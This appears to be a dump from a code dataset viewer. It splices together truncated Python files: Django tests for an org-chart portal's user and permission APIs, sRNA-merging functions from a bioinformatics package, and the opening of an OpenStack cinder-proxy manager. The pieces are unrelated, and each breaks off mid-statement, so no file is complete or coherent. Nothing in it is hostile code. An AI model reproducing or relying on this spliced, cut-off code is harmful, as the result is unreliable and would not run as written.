input
stringlengths 2.65k
237k
| output
stringclasses 1
value |
---|---|
'to_windows_username' : self.user_obj.windows_username,
'column_name' : 'Is Admin',
'new_value' : 'False',
}
,{
'to_windows_username' : self.user_obj.windows_username,
'column_name' : 'Active',
'new_value' : 'True',
}
,{
'to_windows_username' : self.user_obj.windows_username,
'column_name' : 'Active',
'new_value' : 'False',
}
]
@classmethod
def tearDownClass(self):
tear_down()
def test_api_accept_only_admins(self):
remove_admin_status()
payload = self.valid_payloads[0]
content = self.post_and_get_json_response(payload)
self.assertTrue((content['post_success']==False) and ("not an admin" in content['post_msg']),
f"api should have detected that user is not an admin and fail\n{content['post_msg']}")
def test_with_valid_data(self):
for payload in self.valid_payloads:
grant_admin_status()
self.assert_post_with_valid_payload_is_success(payload=payload)
## Check if data was saved correctly
saved_object = TblUsers.objects.using('OrgChartWrite').get(windows_username__exact=self.user_obj.windows_username)
if payload['column_name'] == 'Is Admin':
self.assert_post_key_update_equivalence(key_name=payload['column_name'], key_value=payload['new_value'], db_value=str(saved_object.is_admin))
elif payload['column_name'] == 'Active':
self.assert_post_key_update_equivalence(key_name=payload['column_name'], key_value=payload['new_value'], db_value=str(saved_object.active))
else:
raise ValueError(f"{payload['column']} is not recognized as a valid column value in the payload")
def test_data_validation(self):
payload = self.valid_payloads[0]
parameters = [
# Parameter name # Accepted type
'to_windows_username' # str -> windows username
,'column_name' # str -> 'Is Admin' or 'Active' only
,'new_value' # str -> 'True' or 'False' only
]
for param_name in parameters:
if param_name == 'to_windows_username':
valid = [self.user_obj.windows_username]
invalid = [1, 2.3, False, None, 'sdfds']
elif param_name == 'column_name':
valid = ['Is Admin', 'Active']
invalid = [1, 2.3, False, None, 'sdfds']
elif param_name == 'new_value':
valid = ['False', 'True']
invalid = ['a', 1, 2.3, None, False]
else:
raise ValueError(f"test_data_validation(): parameter test not implemented: '{param_name}'. Please remove or implement it")
for data in valid:
grant_admin_status()
self.assert_request_param_good(valid_payload=payload, testing_param_name=param_name, testing_data=data)
for data in invalid:
grant_admin_status()
self.assert_request_param_bad(valid_payload=payload, testing_param_name=param_name, testing_data=data)
class TestAPIDeleteUser(HttpPostTestCase):
@classmethod
def setUpClass(self):
tear_down()
self.api_name = 'orgchartportal_delete_user'
self.post_response_json_key_specifications = [
{'name': 'windows_username' , 'null': False}
]
self.valid_username = 'some_random_name'
self.valid_pms = TEST_COMMISSIONER_PMS
self.valid_payloads = [
{
'windows_username': self.valid_username,
}
]
@classmethod
def tearDownClass(self):
tear_down()
try:
test_user = TblUsers.objects.using('OrgChartWrite').get(windows_username__exact=self.valid_username)
except ObjectDoesNotExist as e:
... ## Good, do nothing
except:
raise
else:
test_user.delete(using='OrgChartWrite')
def test_api_accept_only_admins(self):
remove_admin_status()
payload = self.valid_payloads[0]
content = self.post_and_get_json_response(payload)
self.assertTrue((content['post_success']==False) and ("not an admin" in content['post_msg']),
f"api should have detected that user is not an admin and fail\n{content['post_msg']}")
def add_test_user_if_not_exists(self):
test_user = TblUsers.objects.using('OrgChartWrite').get_or_create(
windows_username=self.valid_username
,pms=TblEmployees.objects.using('OrgChartWrite').get(pms__exact=self.valid_pms)
)[0]
test_user.save(using='OrgChartWrite')
def test_with_valid_data(self):
for payload in self.valid_payloads:
grant_admin_status()
self.add_test_user_if_not_exists()
response_content = self.assert_post_with_valid_payload_is_success(payload=payload)
## Check if data was deleted correctly
try:
saved_object = TblUsers.objects.using('OrgChartWrite').get(windows_username__exact=self.valid_username)
except ObjectDoesNotExist as e:
... ## Good, do nothing
except Exception as e:
raise ValueError(f"test_with_valid_data(): {e}")
else:
self.assertTrue(False, f"{saved_object.windows_username} still exists in the database, unable to delete user")
## Check that a string was returned for windows_username
self.assert_post_key_lookup_equivalence(key_name='windows_username', key_value=response_content['post_data']['windows_username'], db_value=payload['windows_username'])
def test_data_validation(self):
payload = self.valid_payloads[0]
parameters = [
# Parameter name # Accepted type
"windows_username" # str -> windows username
]
for param_name in parameters:
if param_name == 'windows_username':
valid = [self.valid_username]
invalid = [1, 2.3, False, None, 'whateverhappened?']
else:
raise ValueError(f"test_data_validation(): parameter test not implemented: '{param_name}'. Please remove or implement it")
for data in valid:
grant_admin_status()
self.add_test_user_if_not_exists()
self.assert_request_param_good(valid_payload=payload, testing_param_name=param_name, testing_data=data)
for data in invalid:
grant_admin_status()
self.add_test_user_if_not_exists()
self.assert_request_param_bad(valid_payload=payload, testing_param_name=param_name, testing_data=data)
class TestAPIAddUserPermission(HttpPostTestCase):
@classmethod
def setUpClass(self):
tear_down()
self.api_name = 'orgchartportal_add_user_permission'
self.valid_username = TEST_WINDOWS_USERNAME
self.valid_add_by_division_identifier = 'Legal'
self.valid_add_by_wu_identifier = '1120' #Traffic Ops
self.post_response_json_key_specifications = [
{'name': 'windows_username' , 'null': False}
,{'name': 'perm_identifier' , 'null': False}
,{'name': 'wu_added_list' , 'null': False}
]
self.valid_payloads = [
{
'windows_username' : self.valid_username,
'perm_add_by' : 'division',
'perm_identifier' : self.valid_add_by_division_identifier
}
,{
'windows_username' : self.valid_username,
'perm_add_by' : 'wu',
'perm_identifier' : self.valid_add_by_wu_identifier
}
]
@classmethod
def tearDownClass(self):
tear_down()
def test_api_accept_only_admins(self):
remove_admin_status()
payload = self.valid_payloads[0]
content = self.post_and_get_json_response(payload)
self.assertTrue((content['post_success']==False) and ("not an admin" in content['post_msg']),
f"api should have detected that user is not an admin and fail\n{content['post_msg']}")
def test_with_valid_data(self):
grant_admin_status()
for payload in self.valid_payloads:
self.__remove_any_permissions_added_in_this_test() ## Need to remove additional permissions that is added in this api
self.assert_post_with_valid_payload_is_success(payload=payload)
## Check if data was saved correctly
if payload['perm_add_by'] == 'wu':
saved_object = TblPermissionsWorkUnit.objects.using('OrgChartRead').get(
user_id__windows_username__exact = payload['windows_username']
,wu__wu__exact = payload['perm_identifier']
)
self.assert_post_key_update_equivalence(key_name='is_active', key_value=True, db_value=saved_object.is_active)
elif payload['perm_add_by'] == 'division':
saved_objects = TblPermissionsWorkUnit.objects.using('OrgChartRead').filter(
user_id__windows_username__exact = payload['windows_username']
,wu__subdiv__exact = payload['perm_identifier']
)
saved_wu_permissions = set(each.wu.wu for each in saved_objects)
required_wus_objects = TblWorkUnits.objects.using('OrgChartRead').filter(
subdiv__exact=payload['perm_identifier']
)
required_wus = set(each.wu for each in required_wus_objects)
self.assertTrue(sorted(required_wus)==sorted(saved_wu_permissions)
,f"Permissions added did not match request. In request but not in db [{required_wus-saved_wu_permissions}], and added to db but not in request [{saved_wu_permissions-required_wus}]")
else:
self.assertTrue(False
,f"payload['perm_add_by'] value '{payload['perm_add_by']}' not implemented in test. Wrong data or please add implementation")
def test_data_validation(self):
grant_admin_status()
payload = self.valid_payloads[0]
parameters = [
# Parameter name # Accepted type
'windows_username' # str -> username
,'perm_add_by' # str -> Either 'division' or 'wu'
,'perm_identifier' # str -> a subdiv name, or a wu
]
for param_name in parameters:
if param_name == 'windows_username':
valid = [self.valid_username]
invalid = [1, 2.3, False, None]
elif param_name == 'perm_add_by':
valid = ['division', 'wu']
invalid = ['a', 1, 2.3, '-1', '-1.2', '11.567', '2.2', '4.45', None, False, '']
elif param_name == 'perm_identifier':
valid = [self.valid_add_by_division_identifier, self.valid_add_by_wu_identifier]
invalid = ['a', 1, 2.3, '-1', '-1.2', '11.567', '2.2', '4.45', None, False, '']
else:
raise ValueError(f"test_data_validation(): parameter test not implemented: '{param_name}'. Please remove or implement it")
for data in valid:
if param_name == 'perm_add_by' and data == 'division':
## for division, the perm_id must be a sub div name
payload = copy.deepcopy(payload)
payload['perm_identifier'] = self.valid_add_by_division_identifier
if param_name == 'perm_add_by' and data == 'wu':
## for wu, the perm_id must be a wu
payload = copy.deepcopy(payload)
payload['perm_identifier'] = self.valid_add_by_wu_identifier
if param_name == 'perm_identifier' and data == self.valid_add_by_division_identifier:
## for perm_id with division, the add_by must be 'division'
payload = copy.deepcopy(payload)
payload['perm_add_by'] = 'division'
if param_name == 'perm_identifier' and data == self.valid_add_by_wu_identifier:
## for perm_id with wu, the add_by must be 'wu'
payload = copy.deepcopy(payload)
payload['perm_add_by'] = 'wu'
self.__remove_any_permissions_added_in_this_test() ## Need to remove additional permissions that is added in this api
self.assert_request_param_good(valid_payload=payload, testing_param_name=param_name, testing_data=data)
for data in invalid:
self.__remove_any_permissions_added_in_this_test() ## Need to remove additional permissions that is added in this api
self.assert_request_param_bad(valid_payload=payload, testing_param_name=param_name, testing_data=data)
def __remove_any_permissions_added_in_this_test(self):
permissions = TblPermissionsWorkUnit.objects.using('OrgChartWrite').filter(
Q(user_id__windows_username__exact=self.valid_username)
& (
Q(wu__subdiv__exact=self.valid_add_by_division_identifier)
| Q(wu__wu__exact=self.valid_add_by_wu_identifier)
)
)
for each in permissions:
each.delete(using='OrgChartWrite')
class TestAPIDeleteUserPermission(HttpPostTestCase):
@classmethod
def setUpClass(self):
tear_down()
self.api_name = 'orgchartportal_delete_user_permission'
self.valid_username = TEST_WINDOWS_USERNAME
self.valid_add_by_division_identifier = 'Legal'
self.valid_add_by_wu_identifier = '1120' #Traffic Ops
self.post_response_json_key_specifications = [
{'name': 'windows_username' , 'null': False}
,{'name': 'perm_identifier' , 'null': False}
]
self.valid_payloads = [
{
'windows_username' : self.valid_username,
'perm_delete_by' : 'division',
'perm_identifier' : self.valid_add_by_division_identifier,
}
,{
'windows_username' : self.valid_username,
'perm_delete_by' : 'wu',
'perm_identifier' : self.valid_add_by_wu_identifier,
}
]
@classmethod
def tearDownClass(self):
tear_down()
def test_api_accept_only_admins(self):
remove_admin_status()
payload = self.valid_payloads[0]
content = self.post_and_get_json_response(payload)
self.assertTrue((content['post_success']==False) and ("not an admin" in content['post_msg']),
f"api should have detected that user is not an admin and fail\n{content['post_msg']}")
def test_with_valid_data(self):
grant_admin_status()
for payload in self.valid_payloads:
self.__add_any_permissions_needed_in_this_test() ## Need to add additional permissions that is removed in this api
self.assert_post_with_valid_payload_is_success(payload=payload)
## Check if data was deleted correctly
if payload['perm_delete_by'] == 'wu':
try:
saved_object = TblPermissionsWorkUnit.objects.using('OrgChartRead').get(
user_id__windows_username__exact=payload['windows_username']
,wu__wu__exact=payload['perm_identifier']
)
except ObjectDoesNotExist as e:
... ## Good, do nothing
except Exception as e:
raise ValueError(f"test_with_valid_data(): {e}")
else:
self.assertTrue(False
,f"permission object ({saved_object.user_id.windows_username}, {saved_object.wu.wu}) still exists in the database, unable to delete permission")
elif payload['perm_delete_by'] == 'division':
work_units = TblWorkUnits.objects.using('OrgChartRead').filter(
subdiv__exact=payload['perm_identifier']
)
for work_unit in work_units:
try:
saved_object = TblPermissionsWorkUnit.objects.using('OrgChartRead').get(
user_id__windows_username__exact=payload['windows_username']
,wu__wu__exact=work_unit
)
except ObjectDoesNotExist as e:
... ## Good, do nothing
except Exception as e:
raise ValueError(f"test_with_valid_data(): {e}")
else:
self.assertTrue(False
,f"permission object ({saved_object.user_id.windows_username}, {saved_object.wu.wu}) still exists in the database while trying to delete by division '{payload['perm_identifier']}', unable to delete permission")
else:
self.assertTrue(False
,f"payload['perm_delete_by'] value '{payload['perm_delete_by']}' not implemented in test. Wrong data or please add implementation")
def test_data_validation(self):
grant_admin_status()
payload = self.valid_payloads[0]
parameters = [
# Parameter name # Accepted type
'windows_username' # str -> username
,'perm_delete_by' # str -> Either 'division' or 'wu'
,'perm_identifier' # str -> a subdiv name, or a wu
]
for param_name in parameters:
if param_name == 'windows_username':
valid = [self.valid_username]
invalid = ['a', '-1', '-1.2', '11.567', '2.2', '4.45', 5.46, -1, None, False, True, '']
elif param_name == 'perm_delete_by':
valid = ['division', 'wu']
invalid = ['a', '-1', '-1.2', '11.567', '2.2', '4.45', 5.46, -1, None, False, True, '']
elif param_name == 'perm_identifier':
valid = [self.valid_add_by_division_identifier, self.valid_add_by_wu_identifier]
invalid = ['a', '-1', '-1.2', '11.567', '2.2', '4.45', 5.46, -1, None, False, True, '']
else:
raise ValueError(f"test_data_validation(): parameter test not implemented: '{param_name}'. Please remove or | |
import os
import csv
import math
import copy
import numpy as np
from annogesiclib.gff3 import Gff3Parser
from annogesiclib.helper import Helper
from annogesiclib.coverage_detection import coverage_comparison
from annogesiclib.coverage_detection import replicate_comparison
from annogesiclib.lib_reader import read_wig, read_libs
def modify_attributes(pre_srna, srna, srna_type, input_type):
if (srna_type == "UTR") or (srna_type == "both"):
if pre_srna.attributes["sRNA_type"] != srna.attributes["sRNA_type"]:
if input_type == "pre":
if "antisense" in pre_srna.attributes["sRNA_type"]:
pre_srna.attributes["sRNA_type"] = (
srna.attributes["sRNA_type"])
else:
if "antisense" not in pre_srna.attributes["sRNA_type"]:
srna.attributes["sRNA_type"] = (
pre_srna.attributes["sRNA_type"])
def del_attributes(feature, entry):
attributes = {}
for key, value in entry.attributes.items():
if feature not in key:
attributes[key] = value
return attributes
def detect_overlap(srna, pre_srna, srna_type, overlap):
'''check the sRNA is overlap with other sRNA or not'''
if (srna.seq_id == pre_srna.seq_id) and (
srna.strand == pre_srna.strand):
if (pre_srna.start >= srna.start) and (
pre_srna.end <= srna.end):
modify_attributes(pre_srna, srna, srna_type, None)
overlap = True
elif (pre_srna.start >= srna.start) and (
pre_srna.start <= srna.end) and (
pre_srna.end >= srna.end):
modify_attributes(pre_srna, srna, srna_type, None)
overlap = True
elif (pre_srna.start <= srna.start) and (
pre_srna.end >= srna.start) and (
pre_srna.end <= srna.end):
modify_attributes(pre_srna, srna, srna_type, None)
overlap = True
elif (pre_srna.start <= srna.start) and (
pre_srna.end >= srna.end):
overlap = True
modify_attributes(pre_srna, srna, srna_type, "pre")
return overlap
def merge_tss_pro(pre_srna, srna, feature):
if (feature not in pre_srna.attributes.keys()) and (
feature in srna.attributes.keys()):
if srna.attributes[feature] != "NA":
pre_srna.attributes[feature] = srna.attributes[feature]
elif (feature in pre_srna.attributes.keys()) and (
feature in srna.attributes.keys()):
if (pre_srna.attributes[feature] == "NA") and (
srna.attributes[feature] != "NA"):
pre_srna.attributes[feature] = srna.attributes[feature]
elif (srna.attributes[feature] not in
pre_srna.attributes[feature]) and (
srna.attributes[feature] != "NA"):
pre_srna.attributes[feature] = ",".join(
[pre_srna.attributes[feature],
srna.attributes[feature]])
def modify_overlap(pre_srna, srna):
'''If the sRNA is overlap with other sRNA,
it will modify the position and attributes of gff file'''
merge_tss_pro(pre_srna, srna, "with_TSS")
merge_tss_pro(pre_srna, srna, "end_cleavage")
if (srna.attributes["sRNA_type"] == "5utr") or (
srna.attributes["sRNA_type"] == "3utr") or (
srna.attributes["sRNA_type"] == "interCDS"):
merge_tss_pro(pre_srna, srna, "start_cleavage")
if (srna.start < pre_srna.start):
pre_srna.start = srna.start
if (srna.end > pre_srna.end):
pre_srna.end = srna.end
return pre_srna
def merge_srna(srnas, srna_type):
'''Merge the overlaped sRNA'''
final_srnas = []
first = True
pre_srna = ""
for srna in srnas:
if srna.feature != "ncRNA":
srna.feature = "ncRNA"
if "with_TSS" in srna.attributes.keys():
if srna.attributes["with_TSS"] == "False":
srna.attributes["with_TSS"] = "NA"
else:
srna.attributes["with_TSS"] = "NA"
if "end_cleavage" in srna.attributes.keys():
if srna.attributes["end_cleavage"] == "False":
srna.attributes["end_cleavage"] = "NA"
else:
srna.attributes["end_cleavage"] = "NA"
overlap = False
if first:
first = False
pre_srna = srna
else:
if (srna.seq_id != pre_srna.seq_id):
if not overlap:
if pre_srna not in final_srnas:
final_srnas.append(pre_srna)
pre_srna = srna
continue
overlap = detect_overlap(srna, pre_srna, srna_type, overlap)
if overlap:
pre_srna = modify_overlap(pre_srna, srna)
if (srna.attributes["sRNA_type"] != "antisense") and (
pre_srna.attributes["sRNA_type"] == "antisense"):
pre_srna = srna
else:
if pre_srna not in final_srnas:
final_srnas.append(pre_srna)
pre_srna = srna
srna.source = "ANNOgesic"
if overlap:
pre_srna = modify_overlap(pre_srna, srna)
if pre_srna not in final_srnas:
final_srnas.append(pre_srna)
else:
if srna not in final_srnas:
final_srnas.append(srna)
return final_srnas
def read_gff(gff_file, type_, ex_srna):
datas = []
if os.path.exists(gff_file):
for entry in Gff3Parser().entries(open(gff_file)):
if type_ == "sRNA":
datas.append(entry)
elif type_ == "tss":
datas.append(entry)
else:
if (Helper().feature_without_notgene(entry)):
if (ex_srna) and (entry.feature != "ncRNA"):
datas.append(entry)
elif not ex_srna:
datas.append(entry)
datas = sorted(datas, key=lambda k: (k.seq_id, k.start,
k.end, k.strand))
return datas
def read_table(table_file, file_type):
datas = []
if os.path.exists(table_file):
f_h = open(table_file, "r")
for row in csv.reader(f_h, delimiter='\t'):
datas.append(import_data(row, file_type))
return datas
def merge_incds_utr(utrs, inters):
'''merge the sRNA within CDS and UTR-derived sRNA'''
new_inters = []
for inter in inters:
remove = False
for utr in utrs:
if inter.source == "in_CDS":
if (inter.seq_id == utr.seq_id) and (
inter.strand == utr.strand):
if ((inter.end < utr.end) and (
inter.end > utr.start) and (
inter.start <= utr.start)) or (
(inter.start > utr.start) and (
inter.start < utr.end) and (
inter.end >= utr.end)) or (
(inter.end >= utr.end) and (
inter.start <= utr.start)) or (
(inter.end <= utr.end) and (
inter.start >= utr.start)):
utr.start = min(inter.start, utr.start)
utr.end = max(inter.end, utr.end)
remove = True
if not remove:
new_inters.append(inter)
return new_inters
def compare_srna_cds(srna, cdss, cutoff_overlap):
'''compare sRNA and CDS to get the information of
overlap between sRNA and CDS'''
detect = False
overlap = False
for cds in cdss:
if (srna.seq_id == cds.seq_id) and (
srna.strand == cds.strand):
if ((srna.end < cds.end) and (
srna.end > cds.start) and (
srna.start <= cds.start)) or (
(srna.start > cds.start) and (
srna.start < cds.end) and (
srna.end >= cds.end)) or (
(srna.end >= cds.end) and (
srna.start <= cds.start)) or (
(srna.end <= cds.end) and (
srna.start >= cds.start)):
overlap = True
per_c = float(min(srna.end, cds.end) - max(
srna.start, cds.start)) / float(cds.end - cds.start)
if per_c <= cutoff_overlap:
if "product" in cds.attributes.keys():
cds_name = "".join([
cds.feature, ":", str(cds.start),
"-", str(cds.end), "_", cds.strand,
"(", cds.attributes["product"], ")"])
else:
cds_name = "".join([
cds.feature, ":", str(cds.start),
"-", str(cds.end), "_", cds.strand])
if "overlap_cds" not in srna.attributes.keys():
srna.attributes["overlap_cds"] = cds_name
srna.attributes["overlap_percent"] = str(per_c)
else:
srna.attributes["overlap_cds"] = (
",".join([srna.attributes["overlap_cds"],
cds_name]))
srna.attributes["overlap_percent"] = (
",".join([srna.attributes["overlap_percent"],
str(per_c)]))
detect = True
if not overlap:
srna.attributes["overlap_cds"] = "NA"
srna.attributes["overlap_percent"] = "NA"
return srna
elif overlap and detect:
return srna
else:
return None
def merge_srna_gff(gffs, in_cds, cutoff_overlap, gff_file, ex_srna):
'''merge all types of sRNA and print to one gff files'''
out = open(gffs["merge"], "w")
out.write("##gff-version 3\n")
utrs = read_gff(gffs["utr"], "sRNA", ex_srna)
inters = read_gff(gffs["normal"], "sRNA", ex_srna)
cdss = read_gff(gff_file, "CDS", ex_srna)
num_srna = 0
srnas = None
if (in_cds) and (len(utrs) != 0) and (len(inters) != 0):
inters = merge_incds_utr(utrs, inters)
if (len(utrs) != 0) and (len(inters) != 0):
pre_srnas = inters + utrs
pre_srnas = sorted(pre_srnas, key=lambda x: (
x.seq_id, x.start, x.end, x.strand))
srnas = merge_srna(pre_srnas, "both")
elif len(utrs) != 0:
srnas = merge_srna(utrs, "UTR")
elif len(inters) != 0:
srnas = merge_srna(inters, "inter")
if srnas is not None:
sort_srnas = sorted(srnas, key=lambda x: (x.seq_id, x.start,
x.end, x.strand))
else:
sort_srnas = None
for srna in sort_srnas:
new_srna = compare_srna_cds(srna, cdss, cutoff_overlap)
if new_srna:
new_srna.attributes["ID"] = (
new_srna.seq_id + "_srna" + str(num_srna))
name = '%0*d' % (5, num_srna)
new_srna.attributes["Name"] = "sRNA_" + str(name)
new_srna.attributes = del_attributes("best_high_coverage",
new_srna)
new_srna.attributes = del_attributes("best_low_coverage",
new_srna)
new_srna.attributes = del_attributes("best_avg_coverage",
new_srna)
attribute_string = ";".join([
"=".join(items) for items in new_srna.attributes.items()])
new_srna.info_without_attributes = (
"\t".join([str(field) for field in [
new_srna.seq_id, new_srna.source, new_srna.feature,
new_srna.start, new_srna.end, new_srna.score,
new_srna.strand, new_srna.phase]]))
out.write(new_srna.info_without_attributes + "\t" +
attribute_string + "\n")
num_srna += 1
out.close()
def import_data(row, type_):
if type_ == "inter":
return {"strain": row[0], "name": row[1],
"start": int(row[2]), "end": int(row[3]),
"strand": row[4], "libs": row[5],
"detect": row[6], "avg": row[7],
"high": row[8], "low": row[9],
"detail": row[11], "tss": row[10]}
if type_ == "utrr":
return {"strain": row[0], "name": row[1],
"start": int(row[2]), "end": int(row[3]),
"strand": row[4], "libs": row[5],
"detect": row[6], "avg": row[7],
"high": row[8], "low": row[9],
"detail": row[10]}
def check_real_cut(inter_cuts, tss_type, cut):
for tss, value in inter_cuts.items():
if tss in tss_type.lower():
if cut is None:
cut = inter_cuts[tss]
else:
if cut > inter_cuts[tss]:
cut = inter_cuts[tss]
if cut is None:
if "no_tss" not in inter_cuts.keys():
cut = 0
else:
cut = inter_cuts["no_tss"]
return cut
def get_cutoff(srna, tsss, type_, tables, args_srna):
if type_ == "inter":
tss_type = None
inter_cuts = {"frag": {}, "tex": {}, "notex": {}}
fh = open(os.path.join(args_srna.out_folder, "tmp_cutoff_inter"), "r")
for row in csv.reader(fh, delimiter='\t'):
inter_cuts[row[0]][row[1]] = float(row[2])
if tsss is not None:
for tss in tsss:
if (srna.seq_id == tss.seq_id) and (
srna.strand == tss.strand):
if srna.strand == "+":
if math.fabs(srna.start -
tss.start) <= args_srna.fuzzy_inter:
tss_type = tss.attributes["type"]
if srna.start == tss.start:
break
else:
if (math.fabs(srna.end - tss.start) <=
args_srna.fuzzy_inter):
tss_type = tss.attributes["type"]
if srna.end == tss.start:
break
cut = {"frag": None, "tex": None, "notex": None}
if tss_type is None:
tss_type = "no_tss"
for key, types in inter_cuts.items():
cut[key] = check_real_cut(types, tss_type, cut[key])
elif type_ == "utr":
cut = {}
fh = open(os.path.join(args_srna.out_folder, "tmp_median"), "r")
for row in csv.reader(fh, delimiter='\t'):
if (row[0] == srna.seq_id) and (
row[1] == srna.attributes["sRNA_type"]):
if row[1] not in cut.keys():
cut[row[1]] = {}
cut[row[1]][row[2]] = {"median": float(row[3])}
fh.close()
return cut
def devide_covers(covers):
frag_covers = {}
tex_covers = {}
for cond, tracks in covers.items():
if "frag" in cond:
frag_covers[cond] = tracks
elif "tex" in cond:
tex_covers[cond] = tracks
return frag_covers, tex_covers
def merge_srna_datas(srna_datas_tex, srna_datas_frag):
if (len(srna_datas_tex["conds"]) != 0) and (
len(srna_datas_frag["conds"]) != 0):
srna_datas = copy.deepcopy(srna_datas_tex)
for | |
# Copyright 2014 Huawei Technologies Co., LTD
# All Rights Reserved.
#
# @author: z00209472, Huawei Technologies Co., LTD
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
cinder-proxy manages creating, attaching, detaching, and persistent storage.
cinder-proxy acts as the same role of cinder-volume in cascading OpenStack.
cinder-proxy treats cascaded cinder as its cinder volume,convert the internal
request message from the message bus to restful API calling to cascaded cinder.
Persistent storage volumes keep their state independent of instances. You can
attach to an instance, terminate the instance, spawn a new instance (even
one from a different image) and re-attach the volume with the same data
intact.
**Related Flags**
:volume_topic: What :mod:`rpc` topic to listen to (default: `cinder-volume`).
:volume_manager: The module name of a class derived from
:class:`manager.Manager` (default:
:class:`cinder.volume.cinder_proxy.CinderProxy`).
:volume_group: Name of the group that will contain exported volumes (default:
`cinder-volumes`)
:num_shell_tries: Number of times to attempt to run commands (default: 3)
"""
import time
from oslo.config import cfg
from oslo import messaging
from cinder import context
from cinder import exception
from cinder import manager
from cinder import quota
from cinder import utils
from cinder import volume
from cinder.i18n import _
from cinder.image import glance
from cinder.openstack.common import excutils
from cinder.openstack.common import log as logging
from cinder.openstack.common import periodic_task
from cinder.openstack.common import timeutils
from cinder.openstack.common import uuidutils
from cinder.volume.configuration import Configuration
from cinder.volume import utils as volume_utils
from cinderclient.v2 import client as cinder_client
from cinderclient import exceptions as cinder_exception
from eventlet.greenpool import GreenPool
from keystoneclient.v2_0 import client as kc
from keystoneclient import exceptions as keystone_exception
LOG = logging.getLogger(__name__)
QUOTAS = quota.QUOTAS
CGQUOTAS = quota.CGQUOTAS
volume_manager_opts = [
cfg.IntOpt('migration_create_volume_timeout_secs',
default=300,
help='Timeout for creating the volume to migrate to '
'when performing volume migration (seconds)'),
cfg.ListOpt('enabled_volume_types',
default=None,
help='A list of volume types to use'),
cfg.IntOpt('volume_sync_interval',
default=5,
help='seconds between cascading and cascaded cinders'
'when synchronizing volume data'),
cfg.IntOpt('pagination_limit',
default=50,
help='pagination limit query for volumes between'
'cascading and cascaded OpenStack'),
cfg.IntOpt('voltype_sync_interval',
default=3600,
help='seconds between cascading and cascaded cinders'
'when synchronizing volume type and qos data'),
cfg.BoolOpt('volume_sync_timestamp_flag',
default=True,
help='whether to sync volume status based on timestamp'),
cfg.BoolOpt('clean_extra_cascaded_vol_flag',
default=False,
help='whether to clean extra cascaded volumes while sync'
'volumes between cascading and cascaded OpenStack'
'please with caution when set to True'),
cfg.BoolOpt('volume_service_inithost_offload',
default=False,
help='Offload pending volume delete during '
'volume service startup'),
cfg.StrOpt('cinder_username',
default='cinder_username',
help='username for connecting to cinder in admin context'),
cfg.StrOpt('cinder_password',
default='<PASSWORD>',
help='password for connecting to cinder in admin context',
secret=True),
cfg.StrOpt('cinder_tenant_id',
default='cinder_tenant_id',
help='tenant id for connecting to cinder in admin context'),
cfg.StrOpt('cascaded_available_zone',
default='nova',
help='available zone for cascaded OpenStack'),
cfg.StrOpt('keystone_auth_url',
default='http://127.0.0.1:5000/v2.0/',
help='value of keystone url'),
cfg.StrOpt('cascaded_cinder_url',
default='http://127.0.0.1:8776/v2/%(project_id)s',
help='value of cascaded cinder url'),
cfg.StrOpt('cascading_cinder_url',
default='http://127.0.0.1:8776/v2/%(project_id)s',
help='value of cascading cinder url'),
cfg.BoolOpt('glance_cascading_flag',
default=False,
help='Whether to use glance cescaded'),
cfg.StrOpt('cascading_glance_url',
default='127.0.0.1:9292',
help='value of cascading glance url'),
cfg.StrOpt('cascaded_glance_url',
default='http://127.0.0.1:9292',
help='value of cascaded glance url'),
cfg.StrOpt('cascaded_region_name',
default='RegionOne',
help='Region name of this node'),
]
CONF = cfg.CONF
CONF.register_opts(volume_manager_opts)
def locked_volume_operation(f):
"""Lock decorator for volume operations.
Takes a named lock prior to executing the operation. The lock is named with
the operation executed and the id of the volume. This lock can then be used
by other operations to avoid operation conflicts on shared volumes.
Example use:
If a volume operation uses this decorator, it will block until the named
lock is free. This is used to protect concurrent operations on the same
volume e.g. delete VolA while create volume VolB from VolA is in progress.
"""
def lvo_inner1(inst, context, volume_id, **kwargs):
@utils.synchronized("%s-%s" % (volume_id, f.__name__), external=True)
def lvo_inner2(*_args, **_kwargs):
return f(*_args, **_kwargs)
return lvo_inner2(inst, context, volume_id, **kwargs)
return lvo_inner1
def locked_snapshot_operation(f):
"""Lock decorator for snapshot operations.
Takes a named lock prior to executing the operation. The lock is named with
the operation executed and the id of the snapshot. This lock can then be
used by other operations to avoid operation conflicts on shared snapshots.
Example use:
If a snapshot operation uses this decorator, it will block until the named
lock is free. This is used to protect concurrent operations on the same
snapshot e.g. delete SnapA while create volume VolA from SnapA is in
progress.
"""
def lso_inner1(inst, context, snapshot_id, **kwargs):
@utils.synchronized("%s-%s" % (snapshot_id, f.__name__), external=True)
def lso_inner2(*_args, **_kwargs):
return f(*_args, **_kwargs)
return lso_inner2(inst, context, snapshot_id, **kwargs)
return lso_inner1
class CinderProxy(manager.SchedulerDependentManager):
"""Manages attachable block storage devices."""
RPC_API_VERSION = '1.18'
target = messaging.Target(version=RPC_API_VERSION)
VOLUME_NAME_MAX_LEN = 255
VOLUME_UUID_MAX_LEN = 36
SNAPSHOT_NAME_MAX_LEN = 255
SNAPSHOT_UUID_MAX_LEN = 36
def __init__(self, service_name=None, *args, **kwargs):
"""Load the specified in args, or flags."""
# update_service_capabilities needs service_name to be volume
super(CinderProxy, self).__init__(service_name='volume',
*args, **kwargs)
self.configuration = Configuration(volume_manager_opts,
config_group=service_name)
self._tp = GreenPool()
self.volume_api = volume.API()
self._last_info_volume_state_heal = 0
self._change_since_time = None
self.volumes_mapping_cache = {'volumes': {}, 'snapshots': {}}
self.image_service = glance.get_default_image_service()
self.adminCinderClient = self._get_cinder_cascaded_admin_client()
self._init_volume_mapping_cache()
def _init_volume_mapping_cache(self):
try:
volumes = \
self._query_vol_cascaded_pagination(change_since_time=None)
for vol in volumes:
ccding_volume_id = self._get_ccding_volume_id(vol)
if ccding_volume_id == '':
continue
self.volumes_mapping_cache['volumes'][ccding_volume_id] = \
vol._info['id']
snapshots = self._query_snapshot_cascaded_all_tenant()
for snapshot in snapshots:
ccding__snapshot_id = self._get_ccding_snapsot_id(snapshot)
if ccding__snapshot_id == '':
continue
self.volumes_mapping_cache['snapshots'][ccding__snapshot_id] = \
snapshot._info['id']
LOG.info(_("cascade info: init volume mapping cache is %s"),
self.volumes_mapping_cache)
except Exception as ex:
LOG.error(_("Failed init volumes mapping cache"))
LOG.exception(ex)
